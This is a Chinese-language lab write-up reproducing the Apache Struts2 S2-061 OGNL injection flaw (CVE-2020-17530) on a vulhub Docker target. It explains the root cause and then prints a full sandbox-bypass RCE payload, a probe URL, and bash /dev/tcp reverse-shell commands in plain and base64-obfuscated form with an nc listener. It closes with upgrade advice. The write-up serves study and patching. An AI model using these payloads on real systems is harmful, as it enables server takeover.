1. 预备知识

Struts是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API，鼓励开发者采用MVC架构。Struts也是一个中间件，它可以连接不同的系统和服务，实现数据和功能的交互和集成。Struts有以下几点优势：

1. Struts提供了一个控制器Servlet (ActionServlet)，它可以根据struts-config.xml文件的配置，将传入请求映射到Struts Action对象，并实例化与暂时存储窗体数据的ActionForm对象。
2. Struts提供了定制标记库，以便于在JSP页中与HTML窗体进行交互，并调用代码完成功能和Javadoc支持。
3. Struts提供了模板创建Struts Action对象和ActionForm Bean，并自动在struts-config.xml文件中注册这些类。
4. Struts提供了验证机制，可以对用户输入的数据进行检查，并设置错误消息。
5. Struts与Apache软件基金会的其他项目（如Jakarta、Velocity、Lucene等）兼容，并可以与各种标准的数据访问技术结合在一起，包括EJB、JDBC和JNDI。

2. 漏洞复现

2.1 漏洞介绍

Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API，鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心，吸收了Struts框架的部分优点，提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。
Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530)，在使用某些tag等情况下可能存在OGNL表达式注入漏洞，从而造成远程代码执行,可能照成控制服务器等危害。S2-061是对S2-059沙盒进行的绕过，S2-059的修复补丁仅修复了沙盒绕过，但是并没有修复OGNL表达式的执行
Struts2 会对某些标签属性(比如 id，其他属性有待寻找) 的属性值进行二次表达式解析，因此当这些标签属性中使用了 %{x} 且 x 的值用户可控时，用户再传入一个 %{payload} 即可造成OGNL表达式执行。此次漏洞只是S2-059修复的一个绕过，并且本次利用的核心类org.apache.commons.collections.BeanMap在commons-collections-x.x.jar包中，但是在官方的最小依赖包中并没有包含这个包。所以即使扫到了支持OGNL表达式的注入点，如果没有使用这个依赖包，也还是没办法进行利用

2.2 漏洞原理分析

2.2.1 Apache Struts2架构

1. 客户端提交web请求，指向一个Servlet容器，Servlet容器初步解析该请求
2. 核心处理器Filter Dispatcher 协调其他控制器处理请求并确定合适的 Action
3. 拦截器自动将通用功能应用于请求，例如工作流、验证和文件上传处理
4. Action 方法执行，通常存储或从数据库中检索信息
5. 结果将输出呈现给客户端，可以是 HTML、图像、PDF 或其他内容

2.2.2 OGNL语法介绍

OGNL的全称是对象图导航语言（ Object-Graph Navigation Language），它是一种用于获取和设置 Java对象属性的开源表达式语言，以及其他附加功能，是Struts2的默认表达式语言。使用这种表达式语言，可以利用表达式语法树规则，存储Java对象的任意属性，调用Java对象的方法，同时能够自动实现期望的类型转换。如果将表达式看作是一种带有语义的字符串，那么OGNL就是这个语义字符串与Java对象之间的沟通桥梁，其功能就是双向转换语义字符串与Java对象数据即转换String和Object。
OGNL执行操作三要素：
表达式（Expression）、根对象（Root Object）、上下文环境（Context）
OGNL 三个重要操作符号
OGNL中的三个重要符号：#、%、$，这里重点介绍%，其用途是在标志属性为字符串类型时，计算OGNL表达式的值，类似JS中的函数eval()。例如：<s:url value =“%{items.{title}[0]}”/>。

2.2.3漏洞原理

S2-061和S2-059的OGNL表达执行触发方式一样，S2-059的修复方式为只修复了沙盒绕过并没有修复OGNL表达式执行点，因为这个表达式执行触发条件过于苛刻，而S2-061再次绕过了S2-059的沙盒。
diff一下沙盒，可以看到把很多中间件的包添加到了黑名单中。

已知的OGNL沙盒限制为:

• 无法new一个对象
• 无法调用黑名单类和包的方法、属性
• 无法使用反射
• 无法调用静态方法
  另外，最新的struts2在 ognl.OgnlRuntime#invokeMethod 中ban掉了常用的class，意味着即使绕过了沙盒依然不能直接调用这些类。
  再看一下OGNL沙盒未限制的操作为:
• 对象属性 setter/getter(public) 赋/取值，可以访问静态属性。
• 已实例类的方法调用( OgnlContext 中的对象)，不允许调用静态方法
  可以看到目前我们只能在 OgnlContext 中寻找可利用的对象。
  在s2-061问题中，使用在jsp中定义的类，类似如下idVal=%{3*3}输入将执行双重OGNL评估，从而导致id=“9”
  //example <s:a id=“%{idVal}”/> //result <s:a id=“9”/>
  从diff分析，核心问题的部分在于属性name会调用 completeExpressionIfAltSyntax函数并将其分配给 expr，但在最终OGNL解析expr之前对name进行了递归检查。
  

但是如果不对name进行第二次 OGNL解析，name将不会包含用户提供的来自 URL 参数的数据。但是在前面的evaluateParams函数中却执行了另一个 OGNL解析。

所以对于某些 UIBean标记的名称属性就很容易受到两次 OGNL 解析，这就导致了远程代码执行。

2.3 漏洞复现

2.3.1 靶场搭建

利用vulhub中的镜像strusts2 s2-061，进入到相关目录，执行docker-compose up -d

浏览器访问8080，页面如下搭建成功：

2.3.2 漏洞探测

1. 验证漏洞是否存在
   192.168.10.132:8080/?id=%25%7b+%27test%27+%2b+(2021+%2b+20).toString()%7d
   通过抓取返回包发现执行了 2021+20的命令，漏洞存在
   

2. dnslog验证
   抓包修改为以下，这里的#arglist.add(“xx”)函数这里包含的值是要执行的命令
   

刷新dnslog平台，获得一条访问记录，出网成功

2.3.3 漏洞利用

远程命令执行，把payload的命令换成要执行的命令，如ls列举当前目录环境

反弹shell：

bash -i >& /dev/tcp/192.168.10.132/4444 0>&1

反弹shell涉及到管道符问题要将命令进行base64编码

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEzMi80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}

在vps上监听4444端口：nc -lvnp 4444

反弹shell成功，可执行任意命令

2.3.4 POC分析

首先我们来看s2-061的命令执行方式：

%{ (#request.map=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) + (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + (#request.map2=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) + (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) + (#request.map3=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) + (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) + (#request.get('map3').put('excludedPackageNames',#application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet')) == true).toString().substring(0,0) + (#request.get('map3').put('excludedClasses',#application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet')) == true).toString().substring(0,0) + (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc.exe'})) }

在Struts2 v2.5.26之后将org.apache.tomcat加入了黑名单，导致无法获取BeanMap对象

绕过的新语法如下：

https://<domain>/?skillName=#@java.util.LinkedHashMap@{"foo":"value"}

创建一个 BeanMap 对象，可以通过如下实现：

#@org.apache.commons.collections.BeanMap@{}

2.4 漏洞修复

避免对不受信任的用户输入使用强制OGNL评估，或/和升级到2.5.26版，可修复该漏洞。建议受影响的用户将Apache Struts框架升级至最新版本